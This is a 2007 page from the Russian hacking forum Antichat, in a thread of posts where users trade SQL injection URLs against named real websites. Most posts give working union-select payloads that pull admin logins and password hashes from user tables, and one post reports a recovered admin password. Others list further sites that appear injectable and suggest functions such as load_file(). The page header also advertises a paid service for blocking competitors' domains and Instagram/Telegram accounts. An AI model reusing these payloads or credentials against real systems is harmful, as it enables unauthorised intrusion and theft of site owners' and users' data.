Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 38 из 1242

Опции темы

Поиск в этой теме

Опции просмотра

#371

02.02.2007, 17:31

RaDDeaD

Познающий

Регистрация: 28.12.2006

Сообщений: 44

Провел на форуме:
119257

Репутация: 56

Научился, сделал:

Цитата:

http://pct.ru/news.htm?id=-1+union+select+1,2,database(),4,user()/*

Что можно сделать ещё кроме database() user() ersion() и подобных ?

#372

02.02.2007, 18:04

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

Цитата:

Сообщение от InferNo23

http://notes.asdplus.ru/shop/
около 100юзеров

http://notes.asdplus.ru/shop/view.php?id=-1+union+select+1,2,3,4,5,6,7,name,9,10,11,12,13,14 ,email,nick,17,18,pass,20+from+users+limit+1,2/*

админку не нашел=\ пасс: 31415 логин: admin

http://notes.asdplus.ru:2082/login/ тока логин и пасс не подходят

Цитата:

Сообщение от RaDDeaD

Научился, сделал:
Что можно сделать ещё кроме database() user() ersion() и подобных ?

для начала вот зашиврованный пасс админа
http://pct.ru/news.htm?id=-1+union+select+1,2,3,4,user_password+from+phpbb_us ers+where+user_id=2/* также есть таблица users

Последний раз редактировалось }{0TT@БЬ)Ч; 02.02.2007 в 19:37..

#373

02.02.2007, 20:11

Ig-FoX

Познающий

Регистрация: 28.07.2005

Сообщений: 61

Провел на форуме:
167021

Репутация: 19

Чтото не могу таблицу найти!

Цитата:

http://www.origami.as/gallery.php?gallery=17&image=-304+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15;

Здесь даже не пробовал!

Цитата:

http://vechirka.kiev.ua/issue.php?np=232&id_issue=7'
http://www.totalmusic.ru/default.php?labels_id=172'&page=1&sort=4a'

Здесь есть пароль нет логина:

Цитата:

ttp://transatlas.com.ua/forum/index.php?mode=file&whichuser=-60+union+select+1,concat(id,char(58),pass),3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18+from%20+users+wh ere+id=5/*

Последний раз редактировалось Ig-FoX; 02.02.2007 в 20:13..

#374

02.02.2007, 20:53

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

2Rebz

Да нет, это ты не сделал там нету таблицы admin.

http://www.aceton.pl/category.php?id=-1+union+select+1,2,3,4+from+admin/*

http://www.aceton.pl/category.php?id=-1+union+select+1,2,3,4+Rebz_lol/*

#375

02.02.2007, 20:55

}{0TT@БЬ)Ч

Постоянный

Регистрация: 20.01.2006

Сообщений: 302

Провел на форуме:
3536885

Репутация: 447

http://transatlas.com.ua/forum/index.php?mode=file&whichuser=-60+union+select+1,concat(id,char(58),pass,char(58) ,name),3,4,5,6%20,7,8,9,10,11,12,13,14,15,16,17,18+from +users+where+id=5/* Ig-FoX а это что тогда?

Последний раз редактировалось }{0TT@БЬ)Ч; 02.02.2007 в 21:18..

#376

02.02.2007, 20:57

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Цитата:

Что можно сделать ещё кроме database() user() ersion() и подобных ?

system_user() now() load_file() count(*)

#377

02.02.2007, 21:47

Ig-FoX

Познающий

Регистрация: 28.07.2005

Сообщений: 61

Провел на форуме:
167021

Репутация: 19

Цитата:

http://transatlas.com.ua/forum/index.php?mode=file&whichuser=-60+union+select+1,concat(id,char(58),pass,char(58) ,name),3,4,5,6%20,7,8,9,10,11,12,13,14,15,16,17,18 +from +users+where+id=5/* Ig-FoX а это что тогда?

Это нейм, но он для авторизацыи не используется! Для авторизыцыи используется другой. по сути логин но сгенерированый уже самим форумом!

#378

02.02.2007, 21:52

*D1VER

Участник форума

Регистрация: 05.12.2006

Сообщений: 112

Провел на форуме:
685950

Репутация: 175

Отправить сообщение для *D1VER с помощью ICQ

http://www.perlovka.ru/shownews.php?op=show&n_id=-1+union+select+1,2,table_name,4,5+from+information _schema.tables+limit+21,1/*

#379

02.02.2007, 22:40

Termin@L

Участник форума

Регистрация: 07.12.2006

Сообщений: 192

Провел на форуме:
492591

Репутация: 123

http://gramota.ru/idictation/idictation.php?id=-1+union+select+1,2,3,4,5/*
http://www.fondsk.ru/article.php?id=495+union+select+1,2,3,4,5,6,7,8,9, 10,11/*
\\\\\
http://www.webmascon.com/archive/topic.asp?id=11%20or%201=1--
http://www.kazsu.kz/main.aspx?id=471'
вот эти две на mssql, ничего вывести не получилось, кто хочет можете попробывать
\\\\\
http://www.vesti7.ru/news?id=9671
http://www.nbu.com/news/read.php?id=935
эти очень похожи на инъекцию, но подобрать кол столбцов не получилось

#380

02.02.2007, 23:01

ice1k

Постоянный

Регистрация: 01.01.2007

Сообщений: 551

Провел на форуме:
4908597

Репутация: 1866

Отправить сообщение для ice1k с помощью ICQ

"Ляпис Трубецкой"

http://www.lyapis.com/news_full.php?type=news&id=-99'+union+select+1,2,3,4,concat(login,0x3a,passwor d)+from+users+limit+1,1/*

Страница 38 из 1242

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход